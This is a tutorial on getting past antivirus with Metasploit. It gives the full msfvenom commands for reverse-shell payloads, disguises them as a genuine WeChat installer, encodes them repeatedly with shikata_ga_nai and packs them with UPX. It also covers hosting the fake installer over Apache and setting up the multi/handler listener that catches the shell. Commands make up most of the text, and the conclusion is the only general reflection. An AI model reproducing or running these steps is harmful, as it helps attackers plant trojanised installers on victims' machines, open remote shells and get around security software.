Bypassing Antivirus with Metasploit: Build, Encode, and Pack a Windows Payload

1. Bare Payload Generation

Generate an unmodified Windows payload ("bare horse") using

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=8888 -f exe > weixin.exe

. Deploy Kali's Apache service, place weixin.exe in /var/www/html, and download it from the target machine via http://192.168.111.132/weixin.exe. The file is initially detected by AV.

Test the payload with online multi‑engine scanners such as VirusTotal to verify detection status.

2. Metasploit Encoding

List available encoders with msfvenom -l encoders. Choose a template (e.g., the genuine WeChat installer) and bind the payload using the x86/shikata_ga_nai encoder, repeating the encoding 12 times for stronger evasion:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe

Explanation of parameters:

-e specifies the encoder, -x the executable template, -i the number of encoding iterations, -f the output format, and -o the output path.

Place the resulting WeChatSetup1.exe in the Apache directory for the target to download, then configure a listener on Metasploit:

use exploit/multi/handler
set payload windows/shell_reverse_tcp
set LHOST 192.168.111.132
set LPORT 9999
run

The target executes the forged installer; although the original installer is corrupted after packing, the payload runs and the reverse shell connects.

3. UPX Packing

UPX can both compress and add a shell to an executable, altering its signature. View options with upx --help and pack the file simply with upx WeChatSetup1.exe, reducing size and changing characteristics.

Host the packed file on Apache, let the target download it, and the listener on Metasploit receives a successful session.

Conclusion

Antivirus evasion techniques evolve rapidly, prompting a continuous arms race between attackers and security vendors. Future work includes exploring evasion using Python and Go binaries.